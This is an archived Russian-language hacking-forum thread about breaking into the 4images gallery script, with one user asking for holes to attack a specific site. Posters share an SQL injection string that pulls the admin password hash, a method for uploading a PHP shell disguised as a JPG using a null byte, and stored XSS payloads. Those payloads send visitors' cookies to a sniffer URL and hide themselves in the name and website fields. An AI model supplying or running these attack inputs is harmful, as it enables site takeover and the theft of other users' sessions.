PDA

Просмотр полной версии : помогите с уязвимостями 4images


korrekt
25.01.2006, 23:13
какие есть уязвимости у этой галереи?

Barsik
25.01.2006, 23:37
Скрипт 4images 1.7.1
Опасность критическая
сайт производителя http://www.4homepages.de/
если в разделе "расширенный поиск" в поле "найти юзера" ввести
[Admin nick]' union select user_password from 4images_users where user_name LIKE '[Admin nick]

то скрипт в ошибку выдаст зашифрованный мд5хеш админа

korrekt
26.01.2006, 01:56
это я и так нашёл в инете и это не работает.. нужно что-то ещё..

korrekt
04.02.2006, 13:29
вот здесь - http://forum.web-hack.ru/index.php?showtopic=32196
мне попытались немного помочь и указали на несколько дырок, но я о этих дырках знаю и их уже закрыли на интересующем сайте-галерее. может быть кто-то ещё что-то знает?

slime
03.04.2006, 17:04
Может кто нить знает, как на залить шелл в 4images???

nytros
06.04.2006, 11:31
http://ivdb.org/poc/1312.htm----->4images

Foblas
06.04.2006, 20:31
slime, смотри видео на античате, подробно описано что и как.
Заливаешь шел с расширением jpg, при просмотре картинки добавляем символ конца сроки %00, и php скрипт выпоkyится.

blaga
16.01.2007, 14:54
перезаливать пробовал?

TTyck
16.01.2007, 20:08
кстати, версии 1.7.1 почти все похеканы... в главноq дире лежит шелл под названием config.new.php

blaga
17.01.2007, 12:51
я конечно могу и ошибаться, но если там такой фильтр то мне очень кажется что никак...

злойдядька
23.11.2008, 23:49
активная ХSS в полях имя и сайт.

в поле сайт вводим http://"><img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">

при регистрации вводим имя NAME<img src="javascript:img=new/**/Image();img.src=String.fromCharCode(ЗДЕСЬ ССЫЛКА НА СНИФЕР ЗАКОДИРОВАНАЯ В CharCode)+document.cookie" width="0" border="0">

будет отображатся ваше имя, а остальная часть будет не видна